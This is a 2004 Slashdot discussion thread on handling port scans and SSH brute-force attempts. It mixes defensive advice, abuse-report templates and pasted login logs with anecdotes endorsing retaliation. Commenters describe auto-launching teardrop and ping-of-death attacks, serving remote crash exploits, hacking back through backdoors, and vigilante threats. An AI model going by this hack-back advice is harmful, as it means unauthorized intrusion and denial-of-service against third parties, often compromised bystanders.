      I am now convinced that the whole scene was orchestrated to induce fear and guilt and to leave a lasting impression. If that is the case I have to say that it worked, I almost never go into Target stores now.

      --
      When the only tool you have is a claw hammer every problem starts to look like the back of someone's skull.
    6. Re:I agree! by Random832 · · Score: 1

      I am now convinced that the whole scene was orchestrated to induce fear and guilt and to leave a lasting impression. If that is the case I have to say that it worked, I almost never go into Target stores now.

      Though, looking at the bigger picture, i'd say they would have been better off to just let you take the gum, if they'd known it would drive you - a paying customer later in life - straight into Wal-Mart [or wherever]

      --
      We've secretly replaced Slashdot with new Folgers Crystals - let's see if it notices.
    7. Re:I agree! by Anonymous Coward · · Score: 0

      Though, looking at the bigger picture, i'd say they would have been better off to just let you take the gum, if they'd known it would drive you - a paying customer later in life - straight into Wal-Mart [or wherever]

      That would depend on whether or not he became a habitual shoplifter, if so he could steal enough to merchendise to equal (or exceed) the value any purchases he made. Even it only canceled out it would still be a net lose from the stores perspective. On the other hand, if it was simply a phase during the grandparent poster's childhood then they might have lost "potential sales", but this is straying into RIAA type thinking. I'll stop before we descend that low....

    8. Re:I agree! by operagost · · Score: 1
      I am now convinced that the whole scene was orchestrated to induce fear and guilt and to leave a lasting impression. If that is the case I have to say that it worked, I almost never go into Target stores now.
      I found this result surprising. Most would say that they don't steal anymore. So do you shoplift at Wal-Mart now?
      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
    9. Re:I agree! by Anonymous Coward · · Score: 0

      "It was the the first time and last time I ever tried to shoplift"

    10. Re:I agree! by Anonymous Coward · · Score: 0
      I was administering a box at a hosting service for a client and another box attempted several logins to our SSH server with various accounts from "guest" to "root". That other box was also at the hosting service.

      I found the associated domain and emailed the owner. He thanked me for pointing out his box had been compromised. He found out the cracker had used the FTP brk vuln to get in.


      To: abuse@<DOMAINNAME>, security@<DOMAINNAME>
      Subject: security incident: unauthorized access ttempts

      Security administrator for <DOMAINNAME> (<IP>), please
      note the following and take appropriate action:

      Beginning Sat Jul 17 00:53:05 EDT 2004 and ending Sat Jul 17
      00:53:33 EDT 2004 nine unauthorized login attempts were performed
      against our SSH server. The source IP of the login attempts is
      <IP>. The login names used were test, guest, admin,
      user, and root.

      If you are not the security administrator, or if this machine and
      domain do not have a security administrator, please seek a security
      administrator or contact your Internet provider.

      If I do not receive confirmation of receipt of this message and
      intent of appropriate action within 72 hours, I will report the
      incident to our ISP.

      Thank you for your attention.
    11. Re:I agree! by Anonymous Coward · · Score: 0

      Keep in mind that his response saying he'd been compromised isn't necessarily true. It could just be him trying to save face after being found out. And the secured server admin gets the benefit of putting the guy on notice that the machine is watched.

    12. Re:I agree! by Loconut1389 · · Score: 1

      Problem is, it's easy to see the path that would have happened if only that one variable changed (them letting him keep the gum versus what they did), it's very hard to see all the other what if's. What if he got away with the gum, then next time they didnt catch him stealing a DVD, then he learns about foil lined pockets, steals other stuff.. etc etc.. Then they're probably better off with the warning.

    13. Re:I agree! by LaCosaNostradamus · · Score: 1

      Damned English; concision makes for great quotes but risks misunderstanding. I was pointing out that a society has inherent stability when it doesn't react to threat events by changing law enforcement. We already have sufficient gun regulation, but with each shooting the politicians continue to react by proposing and implementing more restrictive laws. (If anything, weapon laws should be changed from a ban mentality to a qualification one.)

      --
      [You have a stable society when some nut guns down a schoolyard and the law doesn't change.]
    14. Re:I agree! by Alsee · · Score: 1

      Though, looking at the bigger bigger picture, I'd say they're best off with Target *and* Wal-Mart instituting the exact same policy.

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    15. Re:I agree! by Anonymous Coward · · Score: 0

      wow bottom of the page and this is the first response that seems to have a clue. over the last two weeks the number of attempts on the ssh port has been increasing hugely. apparently there's a bot around that searches for an old ssh exploit (an exploit thats abt 2 years old) and I guess then starts to use the server in a spam / phish / DOS botnet.. what else. Dismissing this issue is unwise, there are hundreds of thousands of windows machines caught in botnets with the owners none the wiser and only keeping systems up to date prevents this.

    16. Re:I agree! by jrockway · · Score: 1

      > If that is the case I have to say that it worked, I almost never go into Target stores now.

      Yup, I have a fear of Wal-Mart due to a similar incident. I didn't steal anything but my new jacket set the alarm off (when I was walking in). They assumed that I, the fourth grader, was a huge criminal and let me know it. It still bothers me.

      Fuck Wal-Mart.

      --
      My other car is first.
    17. Re:I agree! by Anonymous Coward · · Score: 0

      I had similar experiences when I was around 13. Only I used to hack into T3 name servers so I could spoof my host on IRC so i could be L337. I got a phone call from a California company once who contacted my isp for my info. Luckily nothing happened since I was only 13 and they gave me a warning. I didn't stop there though, I hacked this one box and rm -rf'd it, couple days later I saw a $10k reward for my capture. Thats when I stopped hacking and soon after I devoted all my time to securing boxen instead of breaking them.

    18. Re:I agree! by Krunch · · Score: 1
      Some years ago I was discovering nmap and tough it would be "cool" to scan port 1337 of random hosts. I let nmap ran for some hours while chatting on IRC. nmap finally scanned some navy.mil hosts. Since it was just a single port on some random hosts, not a full net I tough nobody would notice or care. I was joking about it with my IRC buddies and some hours later in got a mail that was like
      From: security@navy.mil
      Subject: scan port attempt

      It looks like you have attempted to scan port some of our server. Do not do this again or actions will be taken.

      John Smith
      Security Administrator for US Navy Computer Center
      I immediatly stopped nmap and was like OMGWTF. I wasn't really scared since I knew I didn't do anything really bad (or illegal) but HOW THE FUCK DID THEY GOT MY E-MAIL ? It wasn't the one used by my ISP and since I'm not in the US, it would have taken longer for them to get this kind of information from my ISP by legal ways (if they could get it) anyway. I was becoming crazy wondering about Echelon's capacity and things like that and after re-reading the mail several times it turned out it was sent by one of the people I was chatting with. Anyway I don't run nmap against random hosts anymore.
      --
      No GNU has been Hurd during the making of this comment.
    19. Re:I agree! by tylernt · · Score: 1

      Ok, I award 10 out of 10 points for being on the right side, but I still think your quote sounds anti. ;)

      --
      DRM 'manages access' in the same way that a prison 'manages freedom'
    20. Re:I agree! by Anonymous Coward · · Score: 0

      I am now convinced that the whole scene was orchestrated to induce fear and guilt and to leave a lasting impression. If that is the case I have to say that it worked, I almost never go into Target stores now.

      But I do.

      As long as they keep the prices down.

  101. Automated Retribution by Clueless+Moron · · Score: 1
    Many years ago, when people were still running stuff like W98, I set up my box to detect breakin attempts and respond by stuff like teardrop, land, ping-of-death, etc to the offending IP. It would then log if the offender became unpingable.

    Most gratifying was one occasion when the same guy tried rooting me four times in a row, each time separated by five minutes while he was presumably rebooting.

    PS: Yes I do think that turnabout is fair play, and no I didn't get attacked by legions of crackers afterwards.

  102. Think, first. by Anonymous Coward · · Score: 1

    Ask your management first. Don't do ANYTHING without their consent, even sending an abuse report.

    Remember, you are there for technical work - Let management make the decisions or you may find yourself out of a job. Some companies do not want the embarassment or hassle of dealing with intrusions, and most usually want nothing to do with law enforcement.

    Do you have policies in place? What are your procedures for handling "chain of custody"? Do you have evidence on trusted media, printouts, optical disc? Have you established a line of reporting to a senior manager who can observe your actions for an audit trail?

    Don't play cop unless you know what you're getting yourself into. Ignore this at your peril.

  103. Easier by tufflove · · Score: 0

    ......shoot them.

  104. Re:Somewhat offtopic, but how do people deal with by 241comp · · Score: 2, Funny

    Preferably the job should be outsourced to a 3rd party subcontractor of foreign origin

    Ack! Now even slashdot is promoting offshoring!!! Ugh...

  105. If you're really worried by shane2uunet · · Score: 1

    If you're really worried, change your SSH port. I too have noticed the increase attempts to guest, admin, test, and root accounts via ssh. I just changed the port. That has worked very well to keep them from even trying. Doesn't hurt to mix obscurity WITH security.

    --
    This space available for rent.
  106. Mozilla Amazon Browser by colores · · Score: 1

    The MAB is a tool for searching the Amazon catalogs and browsing their products. It can be used as very impressive Online Application from Mozilla-like browsers

  107. I usually just ignore them by dave-tx · · Score: 1
    99% of the time, I just ignore these attempts, as I'm pretty confident that I'm secure. I will admit though, that ssh login attempts make me nervous. I've been meaning to change my ssh port, this will probably remind me to do it.

    However, one time a few years ago, I was sitting at the console while multiple attempts were made on various ports. Being in the mood I was in, I looked up his IP address, and found that he was on a local ISP. Decided to call tech support of that ISP. The support guy confirmed my report, then suspended his account on the spot.

    That was a bit of instant gratification for me, and probably a lesson for the (likely) high school kid on the other end.

    --

    >> "What would the robut do? Frame someone!"

    1. Re:I usually just ignore them by g0bshiTe · · Score: 1

      True, unless he was smart enough to use someone elses network first.

      As for the articles author I think you just have an army of 1337 k0d3 kiddies knocking at your gates.

      Give em a honeypot that sends em frags. Not like they can report you to anyone.

      hacker: Yeah I was just minding my own buiness trying to hack into root on XX.XXX.XX.XXX and the admin sent back frags and killed my box.
      abuse@yourip: So you were hacking another network, and the admin killed you?
      hacker: well yeah, is there anything you can do to this guy.
      abuse@yourip: grow up kid. get some clearasil and go out on a date. steer clear of donkey pr0n.

      --
      I am Bennett Haselton! I am Bennett Haselton!
  108. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    your MAC address is transmitted over the Internet

    Your MAC address is part of the ethernet frame (see here), which gets stripped as soon as it crosses a layer 3 device like a router. At best your MAC address is transmitted over your LAN, or maybe your cable modem neighborhood. MAC address filtering is only good for checking for foreign users on a local network, and even then ignores the fact that most hardware these days have configurable MACs.

  109. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    Post his info here.

    We'll take care of him.

  110. buy a shuttle by Kookus · · Score: 0

    they're cheap and small. perfecto for installing linux/bridge on and then making a firewall out of it. I only allow traffic from non-domain computers through to http(s), smtp and imaps. Best thing is, with a little work you can make yourself a set of webpages on your shuttle that will invoke iptables/ebtables to block off intruders. Then you don't feel so inadequate when you see someone trying to break in. In fact I've gone so far as to make my own IDS and have it look periodically for a few known things like sql server login attempts and smb... atleast that keeps my log files a little cleaner so I can assess the real problems easier. You never have to ignore anything... and this solution only cost me a grand. If someone wants it, I've made my shuttle capable of making a replica of itself on cd (live-cd at that) for easy distribution - running debian.

  111. Read This Book by seaniqua · · Score: 1

    Cuckoo's Egg by Cliff Stoll. Not entirely relevant to today (describes tracking a hacker in the late 80s/early 90s), but a good read, and gives general ideas.

    --
    That's right, I read at +2 and post at +1. Not even I care what I have to say.
  112. Better luck next time ... by Etyenne · · Score: 0, Offtopic
    I've got their IP addresses and can usually tracert their ISP's

    If you've got tracert, you are running the wrong OS.

    --
    :wq
  113. How I dealt with intrusion attempts... by chrysrobyn · · Score: 1

    In college, I was on what seemed like the world's biggest unswitched subnet. All the dorms could see the ethernet traffic from all the others. Some of us ran packet sniffers to see what interesting stuff we could learn. Eventually came the day when the packet sniffers got easy to use and just started dumping out passwords and logons. That's when the port scans followed by log in attempts got almost continuous.

    Fortunately for me, about the same time, windows denial of service attacks and remote crash programs were also in vogue (http://www.rootshell.org , but it no longer seems to have the same focus). So, I made my finger port respond with about a dozen of the most popular remote DOS/BSOD exploits. This worked very well. Remote login attempts stopped.

    For grad school, I moved off campus. We got a cable modem with Road Runner. I didn't disable that autoresponse. One of the ambitious admins (hi, Mr. Herrick) decided to do some port scans to verify nobody was running mail servers / IRC servers etc. About the third time he port scanned me (with a windows machine), our cable modem was disabled and I had to have a conversation with the admin about what was happening and why. He seemed to like my explanation, asked me to disable my countermeasures and reactivated my cable modem.

  114. Barring port scans gives no security by Morgaine · · Score: 1

    Don't scan my ports!

    Worrying about port scans is a blast from the past. Let's see now, 65536 ports, that's 16-bits of space from which to brute-force your secret. Do you see anyone advocating 16-bit encryption as secure? I don't think so. You are truly pwned.

    If your security depends on people not knowing which ports you have open, then you have no security.

    --
    "The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
  115. I prefer Jay and Silent Bob's method. by Chas · · Score: 1
    1. Track the bastiches down
    2. Buy a lot of plane tickets.
    3. Show up on their doorsteps, at their offices, etc
    4. Kick the ever-living SHIT outta them until their chances of ever coming out of the coma are only exceeded by their chances of living until the end of time.


    And it's so damn CATHARTIC!
    --


    Chas - The one, the only.
    THANK GOD!!!
  116. A possible new (harmless?) ssh attack by Masem · · Score: 1
    For about 2 months now, I've had a box getting hit with some address (not the same) from what appears to be an home ISP with someone trying to log in via ssh using "guest", "test", and "root", exactly 5 times each in nearly every case. The IP varies each time, and it's not a massive attack, so it sounds to me like a result of a comprimised machine running some automated script that tried to ssh their way into accounts via default passwords, which, to the best of my knowldge, is generally not a default linux install from any distro.

    I've not had luck confirming this with anyone else (I have a friend that says they've seen the same and thought they had some security reference about this), but this only is recent, so may be part of it.

    --
    "Pinky, you've left the lens cap of your mind on again." - P&TB
    "I can see my house from here!" - ST:
    1. Re:A possible new (harmless?) ssh attack by Trackside · · Score: 1

      There was something posted on the ISC a while back about this. I've been noticing similar attempts on a few of my systems with the same pattern.
      http://isc.incidents.org/diary.php?date=2004-07-28

    2. Re:A possible new (harmless?) ssh attack by TheSync · · Score: 1

      I've been getting the same attacks!!!!!!!

      Here are some recent dates/IPs...

      Date: 13 Aug 2004 09:47:50 -0000
      Failed password for illegal user test from 199.126.48.24 port 2592 ssh2

      Date: 11 Aug 2004 18:20:32 -0000
      Failed password for illegal user test from 163.17.136.172 port 37218 ssh2

      Date: 11 Aug 2004 14:21:59 -0000
      Failed password for illegal user user from 210.91.208.103 port 35096 ssh2

      Date: 10 Aug 2004 19:27:30 -0000
      Failed password for illegal user test from 218.189.216.82 port 4383 ssh2

      Date: 10 Aug 2004 01:42:26 -0000
      Failed password for illegal user test from 202.94.168.1 port 1911 ssh2

      Date: 9 Aug 2004 13:21:32 -0000
      Failed password for root from 61.221.77.82 port 1524 ssh2

      Date: 9 Aug 2004 01:16:34 -0000
      Failed password for illegal user test from 219.153.4.62 port 44974 ssh2

      Date: 7 Aug 2004 23:08:02 -0000
      Failed password for illegal user admin from 66.111.192.21 port 41135 ssh2

    3. Re:A possible new (harmless?) ssh attack by kevin42 · · Score: 1

      Me too:
      Aug 12 03:02:30 : Failed password for illegal user test from 217.160.240.131 port 33627 ssh2
      Aug 12 03:02:33 : Failed password for illegal user guest from 217.160.240.131 port 33696 ssh2
      Aug 12 03:02:41 : Failed password for illegal user user from 217.160.240.131 port 33938 ssh2
      Aug 12 03:02:52 : Failed password for illegal user test from 217.160.240.131 port 34270 ssh2
      Aug 12 08:15:50 : Failed password for illegal user test from 211.238.160.28 port 3383 ssh2
      Aug 12 08:15:51 : Failed password for illegal user test from 211.238.160.28 port 3403 ssh2
      Aug 12 08:15:54 : Failed password for illegal user guest from 211.238.160.28 port 3491 ssh2
      Aug 12 08:15:55 : Failed password for illegal user guest from 211.238.160.28 port 3507 ssh2
      Aug 12 08:16:07 : Failed password for illegal user user from 211.238.160.28 port 3786 ssh2
      Aug 12 08:16:08 : Failed password for illegal user user from 211.238.160.28 port 3813 ssh2
      Aug 12 08:16:23 : Failed password for illegal user test from 211.238.160.28 port 4219 ssh2
      Aug 12 08:16:25 : Failed password for illegal user test from 211.238.160.28 port 4250 ssh2
      Aug 12 10:17:16 : Failed password for illegal user test from 194.78.243.110 port 1761 ssh2
      Aug 12 10:17:20 : Failed password for illegal user guest from 194.78.243.110 port 1866 ssh2
      Aug 12 10:17:30 : Failed password for illegal user user from 194.78.243.110 port 2168 ssh2
      Aug 12 10:17:44 : Failed password for illegal user test from 194.78.243.110 port 2570 ssh2
      Aug 12 10:29:58 : Failed password for illegal user test from 194.78.243.110 port 2402 ssh2
      Aug 12 10:30:02 : Failed password for illegal user guest from 194.78.243.110 port 2510 ssh2
      Aug 12 10:30:12 : Failed password for illegal user user from 194.78.243.110 port 2818 ssh2
      Aug 12 10:30:26 : Failed password for illegal user test from 194.78.243.110 port 3235 ssh2

    4. Re:A possible new (harmless?) ssh attack by Anonymous Coward · · Score: 0

      That exact same things has been happening to me since about July 15. Here is two of the most common ip's I see in the logs.

      202.100.222.123
      65.120.161.253

  117. Hack them back by Pedrito · · Score: 1

    You can do what I do. Try to hack them back. I don't do this for worm type attacks, but a if there are real obvious manual attempts to hack my system, I try to hack the person back. Doesn't always work, but what's really funny is so many of these guys have accidentally installed exploitable stuff on their machines, like BO2K server and otherwise have unprotected systems. I'll usually try to get in and leave a real obvious note. Maybe a message box or replace their wallpaper with a note saying, "Do you really think you ought to be hacking other people's boxes when you can't protect your own?" Stuff like that.

    I'm not sure how effective a deterrent it is, but it sure is fun and gives me loads of satisfaction. As for the legal aspects, I can't say, but I figure someone trying to hack my box is pretty much giving me the right to hack theirs back. Of course, that's probably akin to vigilante justice which isn't legal...

  118. Let them in! by ganiman · · Score: 1

    What you should do is set up a chroot environment. Make it really easy for them to get in, but when they actually do gain access to the machine, they will be in a chroot'd environment. You could even set up all kinds of stuff in that environment to make them think that they are 31337. Once they mark their territory or whatever they want to do, they may never bother you again. Then reset the chroot environment so they next sucker thinks he's the first in.

    --
    geek n performer who performs morbid or disgusting acts, as biting off the head of a live chicken
  119. Easy, really by KlausBreuer · · Score: 4, Funny

    The online cartoons - once again - show us how the world works. Here you can find the difference between Hollywoods form of dealing with intruders, and The Real Worlds:

    Bigger Than Cheese
    --
    Free PC version of ChipWits at http://www.breueronline.de/klaus/chipwits/
  120. Re:What intruders? - Good point! by B2382F29 · · Score: 1

    and wipes out all your data.

    including connection logs ... so what's the point ?

    --
    Move Sig. For great justice.
  121. Prevention Program by Anonymous Coward · · Score: 1, Funny

    This is like the kid that walks down the parking lot, checking all the car doors. Private property, which means the company has to call the cops.

    If you want to do something, then you can send a letter to the ISP. Otherwise, you have to make like the Brittons; batten down the hatches and hope the Luftwaffe pass you by.

    I guess you can go hunting, too. Hack the ISP, grab a ballbat, and send a "cease and desist" request yourself. An ounce of assbeating is worth more than a pound of Congressional Legislature.

  122. Human responses to intrusion don't scale by Morgaine · · Score: 2, Informative

    When she found out about attacks and attempted intrusions, she got on the phone with the netblock owner and gave them an earful and followed up until something happened, even if it was only a small improvement. If need be, she reported it to the police and was even able to convince them that crime was an area of their responsibility even if they did not currently have the expertise.

    The problem with your suggestion is that human response doesn't scale. At her average low of 15 mins per day dealing with the problem manually or socially, the rate of intrusions only has to increase 32-fold before it takes up an entire 8-hour normal working day. How many thousands of network admins are you going to hire to handle a DDoS attack from 100K sources? There is no limit to the number of owned Windows boxes out there.

    It doesn't scale and it doesn't help. It is far better to spend your network admin's time on making your systems ever more impervious to attack, and if she has any time left over, to teach others how to do likewise. Ultimately, if all sites are securely tied down then it doesn't matter what the cracker kiddies are doing.

    --
    "The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
    1. Re:Human responses to intrusion don't scale by CheeseTroll · · Score: 1

      But if *every* network administrator spent 15 minutes a day actively letting intruders know that their actions have been detected and are not appreciated, it would scale quite nicely.

      --
      A post a day keeps productivity at bay.
  123. Berzerk holds the answer! by payndz · · Score: 1
    "Intruder alert! Intruder alert!"
    "KILL THE HUMANOID! KILL THE INTRUDER!"

    Old videogames have the answer to everything!

    --
    You must think in Russian.
  124. Comment removed by account_deleted · · Score: 3, Insightful

    Comment removed based on user account deletion

  125. How we handle these situations in Finland by Anonymous Coward · · Score: 1, Funny

    I once heard a story about a someone who had a (warez) ftp server which someone kept brute forcing. This happened here in Finland, in a small town of about 20000 residents (in which I don't live in, though).

    Being a little pissed off as the attacking continued for some time consuming his precious bandwith, he tracked his IP and with some social engineering he found out the attacker was just some high-school script kiddie, along with the information of where he lived. So he went where the attacker lived and left a note on his home door with something like "stop bruteforcing my server or else...".

    Suddenly, the attacks stopped :)

    1. Re:How we handle these situations in Finland by maduro55 · · Score: 1

      Sometimes the "or else" is all the motivation they need to stop!

  126. Don't waste your time by Anonymous Coward · · Score: 0

    ISP's are not in the business of pissing off their customers. They're in the business of keeping the ones they've got and getting even more. All you'll get is a form letter; most likely the person at the source address won't even hear from them.

    In my experience complaints sent to government entities and most universities elicit a positive response. Just make sure you've got the logs to back up your complaint. Include dates, times, and packet captures if you've got them.

  127. lock your machine, and CYA by bigmoosie · · Score: 1

    Lock your machine down and CYA (cover your ass) with lots of banners, any port that you have open to the outside, have a banner stating the AUP for your organization. For the main website, a like should be sufficient, but check with your legal department. After you post the banners, start recording the traffac, as with your AUP, consent to monitoring is perfectly legal if they click OK or continue to log in. That way you have more of a case should someone actually break into your systems ... or more of a case when you send a letter to the upstream ISP, they won't give a shit if you don't have banners. just m $0.02 ~ryan

  128. Re:Somewhat offtopic, but how do people deal with by rfc1394 · · Score: 1
    I sent Comcast (his isp) the IRC logs & the network monitor logs.
    They sent me a generic response saying "blah blah blah.. this is an automated response". And thats it.
    So how do other /.ers deal with situations like this?
    You call Comcast - I think their HQ is in Philadelphia, but look up their website to be sure - find their headquarters, or use whois on their domain name, then ask for their legal department, then simply ask the person who answers how to spell the name of their general counsel, and their fax number. ("Hi, I was supposed to write your General Counsel a letter but I forgot to get their name.") Then you send them a message stating that at a certain date and time someone at such-and-such an IP address hacked into your system, (and give each such item for each of the attempts, even if it takes several pages) and is continuing to do so, and Comcast has taken no action to stop this party despite repeated requests, and if they do not you will presume that someone in authority at Comcast is either approving of or acquiescing to this activity and that if they don't make it stop, you will have no choice but to take all appropriate action including but not limited to filing charges for computer trespass and a civil suit for damages.

    Send a copy by snail mail.

    They do not know if you'll sue but this should get a response. You might also make it clear that if the attacks stop you have no interest in any further legal action. This lets them know: get rid of your problem, and you won't be their problem.

    --
    The lessons of history teach us - if they teach us anything - that nobody learns the lessons that history teaches us.
  129. Use MyNetWatchman by laitcg · · Score: 1

    Q: What is myNetWatchman?

    A: myNetWatchman collects, analyzes and reports malicious access attempts to ISPs, who can then take action against the offending machines.

    Q: How does it work?

    A: A small client-side application runs as a background application on your system; reading your firewall logs, and creating near-real-time reports that are relayed to the myNetwatchman servers for analysis.

    Q: How does myNetWatchman know the difference between a threat and a false alarm, and how does it respond?

    A: When the analysis routine determines that a legitimate threat exists (based on reports from several agents), an automatic "Escalation Report" is sent to the abuse department of the offender's ISP. Any responses received from the ISP are also tracked.

    --
    When you want a computer system that works, just choose Linux. When you want a computer system that works, just, choose
    1. Re:Use MyNetWatchman by Anonymous Coward · · Score: 0

      Seriously, take any IP from your logs that has been scanning you and I bet mynetwatchman.com already knows about it and has automagically generated an email to the IP's owner.

      I understand you can use their service to add rules to your firewall as well, but I've not tried that yet.

  130. Document Everything by catdevnull · · Score: 4, Informative

    Data integrity is more important than catching them. Rememeber that first.

    1) Make notes about what you've found
    2) Report the the abuse as per the WHOIS info for the offenders
    3) Block their IPs at your border

    If you're using a firewall, great. If not--get one.
    If you haven't read Frisch's "Essential System Admnistration" read it:
    http://www.oreilly.com/catalog/esa3/index.html

    If you haven't read Stephen Northcutt's "Network Intrusion Detection" you should probably give it a good read as well:
    http://www.amazon.com/exec/obidos/tg/detail/-/0735 708681/104-7409931-6853536?v=glance

    There are some good articles all over the web regarding Linux security. A few google searches will help uncover them.

    Patch. It's not just for Windows.

    Limit services with ACLs and host restriction.

    Harden your system by partitioning read/write slices away from static mountpoints where your binaries are by mounting the read only ones as read only.

    chattr +i on your binaries--makes it tougher for skript kiddies.

    Talk to other admins--every day is a school day.

    AND

    Face the fact that you're not as smart as the crackers so you just have to create layers of security that keep you from being an easy target.

    --

    I might know what I'm talkin' about, but then again, this is Slashdot...
    1. Re:Document Everything by PitaBred · · Score: 1

      Oh, I'd almost guarantee you that I'm as smart, if not smarter than they are. I just don't devote the time to it that they do, and don't have some of the same information. Intelligence has nothing to do with it, it's the drive. The layers are a good idea because I don't want to spend the same amount of time as they do on it.

    2. Re:Document Everything by Anonymous Coward · · Score: 0

      Nice write up, kudos (would have left the pat on the back to the crackrs off though, otherwise, good job)

    3. Re:Document Everything by catdevnull · · Score: 1

      Intelligence, tenacity, creativity, and motivation are the ingredients to "smart" --I'll give credit to the true elite but not the kiddies. Anyone who can craft ICMP packets to carry encrypted commands to a trojaned daemon as their secret knock is pretty damn smart in my book and probably more adept behind the keyboard than the average sysadmin. my point was to never believe that you're safe. be paranoid and assume that they know stuff you don't.

      --

      I might know what I'm talkin' about, but then again, this is Slashdot...
    4. Re:Document Everything by catdevnull · · Score: 1

      smart is the quotient of intelligence times motivation times creativity not raw intelligence.

      the point was to assume they're "smarter" about things for the reasons you've sited not to imply that crackers are a higher calibre of human beings with superhuman powers.

      the art of sysadmin is the art of functional paranoia. always assume you're at a disadvantage and you'll have the advantage.
      (this axiom is either total BS or very wise--your call.)

      --

      I might know what I'm talkin' about, but then again, this is Slashdot...
    5. Re:Document Everything by Anonymous Coward · · Score: 0

      The shift key exists. Please use it.
      *cited

  131. Ignore Them by Anonymous Coward · · Score: 0

    I agree with the others. Ignore the little shits. Yeah, they piss me off too. Sometimes people have nothing better to do with their time than to pull their puds and sit in front of a pc doing this $heot. I pose an open question to these freaks- why don't you all get a life?

    Anyway, keep logging and checking. Make sure your machines are patched and your firewall is configured correctly. If they can't breach anything, eventually they'll give up.

    God Save The Queen

  132. Upstream blocking by Etherael · · Score: 2, Interesting

    It would be nice to adopt a routing protocol extension where you could ask an upstream router to block packets meeting a given criteria (*only to yourself, of course*). This would destroy DDOS attacks, which are currently the only really unstoppable attacks in existance, say you're getting flooded by ICMP from 250 hosts, and you just tell the upstream router to block ICMP traffic from the hosts in question (or for convenience sake, altogether, whatever really) It'd pretty much leave you scot free, in fact if it was extended further, DDOS zombies might get to the point that all their outbound traffic was blocked at their closest non controlled router point, which might clue in the users as to the status of their machines.

    Patent Pending!

    1. Re:Upstream blocking by Creepy+Crawler · · Score: 1

      I see some creative MitM attacks with that one ;)

      How do you verify a said router is tustworthy to build a noroutelist for..
      How do you login?
      How do you prevent attacks where it disables the person requesting to be de-routed? And then "take control of their routes".

      I see some serious holes in this...

      And I'd sure as hell would NOT install this remote root kit on my routers.

      --
    2. Re:Upstream blocking by Etherael · · Score: 1

      How do you verify a said router is trustworth to build a noroutelist for...

      Is the router downstream for me? (am I passing junk to this router as a direct next point of call)

      How do you login?

      Why would you login? You only allow people to modify the routing tables *TO* their devices, thus the only thing they can do is DOS themselves if they want to try and be nasty (block all packets to me, HA! PHEEER! err.. no, wait.. hang on.. hey, come back!)

      How do you prevent attacks where it disables the person requesting to be de-routed? and then take control of their routes...

      You've sorta lost me here, you can only request a route block from a given host *to* yourself... as in 203.2.193.124 could request from it's immediate upstream router blocking traffic from 153.101.234.12, if it did this to the entire internet, it would harm noone but itself.

      Basically it's just a remote interface to simple IP forward blocking hard restricted to only affect the destination of the endpoint. There are a thousand ways to implement this, from a http interface, which I wouldn't particularily recommend but could work just as well I guess, to ssh or just UDP packets thrown at the router containing IP addresses and protocol information to block, then the destination is decided based on the source address of the UDP packet (which is contacted for verification and asked "did you really send me this packet" out the appropriate interface, so spoofing wouldn't be a vulnerability, and remember we're talking about single jump upstream routers here)

      The more I think about it the more I'm convinced it would work, Hmmm, time to whack together an RFC perhaps?

  133. ignore or block.... by TeKn0wLeD-G · · Score: 1

    i actually create a block list of IPs that come in and attempt such attacks on my servers. i got tired of the worrying about if someone would get into something, so now i just shut the door on them for the next time. sure they could spoof their IP or come in from another one, but if i reach x amount from a certain IP range, i'll wildcard the remainder.... sux to think that i could lose a few customers based on that, but i'd rather ensure the security of the ones i do have.

  134. C'mon these are kids just learning. by mewphobia · · Score: 0, Redundant

    Don't do anything. If you can see them in your logs, chances are they are just kids experimenting. They obviously have too much free time on their hands. Keep your sisters tight and learn from intrusion attempts but just let them play. No need to report it.

    How else are they meant to learn? For a lot of geeky kids, this is their teen angst getting out. It's like the kids who steal your fruit from your fruit tree. It's an inconvienence, but they'll get over it eventually. And they'll develop an appreciation of fruit.

    I used to be very security/network focused for a few of my highschool years. I grew out of it. Somehow life seems to get in the way.

    1. Re:C'mon these are kids just learning. by Hassman · · Score: 1

      ...sarcasm...
      You're right. We shouldn't discourage this kind of act. Let them learn how to compromise the security of systems. Let them mess around on companies networks. Who cares about lost revenue or if a few credit card numbers or other valuable information is leaked. The kids are harmless right? They won't try to profit from that.

      And all those viruses that get written for windows...let's not stop those people either. Most of the time they are just kinds / young adults learning how to program, or how *not* to program. They are just learning how to write more secure code. After all if you know how to compromise a system then you can make yours safer right? It doesn't matter than big business is disrupted and millions of dollars are lost to these actions... they are just kids.

      Won't someone please think of the children!?!
      ...end sarcasm...

      Please. This is like any other wrong / criminal act. It should have consequences. If you break into someone's house and steal, you go to jail. Why should it be any different for sensitive information contained on a computer system?

      --
      -Mark
      Dovie'andi se tovya sagain.
    2. Re:C'mon these are kids just learning. by mewphobia · · Score: 1
      Please. This is like any other wrong / criminal act. It should have consequences. If you break into someone's house and steal, you go to jail. Why should it be any different for sensitive information contained on a computer system?

      C'mon, this guy is talking about portscanning. Not credit card fraud. If the portscans are caused by virii, the authorities are already onto it. These are intrusion attempts.

      If you're an admin, and a script kiddie can get all the credit card info on your site, you should be fired. If some kind of sophisticated attack takes place, sure send a letter to the appropriate ISP.

      Furthermore, false reporting just clogs the legal system. I have a friend who got 6 months (reduced to community service on appeal) for trying to log on as root on a couple of .edu servers. Does the punishment really fit the crime?

    3. Re:C'mon these are kids just learning. by Hassman · · Score: 1

      You're right. It is the banker's fault for letting the robbers steal money from the vault.

      --
      -Mark
      Dovie'andi se tovya sagain.
  135. port scan != casing the joint by Ayanami+Rei · · Score: 4, Insightful

    Casing the joint would be when you then attempt to connect to each open port in turn, and try to verify the version of the server running on each port, perhaps by submitting malformed requests and looking for characteristic responses.

    That would be indicitave of someone trying to find a way in.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
    1. Re:port scan != casing the joint by Entropius · · Score: 5, Insightful

      Port scanning is akin to looking to see what doors the house has, if any are open, and if any have "LEMONADE SOLD INSIDE" signs on them.

      If you find a machine with port 139 (or whatever the netbios port on it) open, and they've got their C drive shared, don't touch--it wasn't meant for you.

      If you find a machine with port 80 open, then you're not doing any harm to pull http://xxx.xxx.xxx.xxx/index.html and see what lives there.

      Common sense and common courtesy are really all it takes: if it looks like someone meant to make something accessible, then use it. If someone takes any steps to secure something (even if they're ineffective) or wouldn't be offering it if they knew what they were doing (like the shared C drive), stay away.
